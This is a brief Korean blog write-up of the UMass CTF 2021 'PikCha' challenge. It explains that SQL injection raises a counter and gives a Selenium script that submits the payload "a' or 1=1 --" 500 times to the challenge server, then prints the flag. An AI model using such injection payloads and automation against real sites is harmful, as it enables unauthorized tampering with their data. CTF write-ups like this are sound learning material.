write up/UMass CTF 2021

UMass CTF 2021 - PikCha

heegong 2021. 3. 30. 17:53
728x90

문제

 

 

 

 

이런 사이트다.

 

 

 

 

 

sql injection으로 count를 올릴 수 있다.

 

 

 

from selenium import webdriver

url = "http://34.121.84.161:8084/"
driver = webdriver.Chrome('chromedriver.exe')
driver.get(url=url)
driver.implicitly_wait(5)
for i in range(500):
    driver.find_element_by_xpath('//*[@id="guess"]').send_keys("a' or 1=1 --")
    driver.find_element_by_xpath('/html/body/section/form/input[2]').click()
input()

셀레니움으로 빨리 풀 수 있었다.

 

 

 

 

 

 

플래그 : UMASS{G0tt4_c4tch_th3m_4ll_17263548}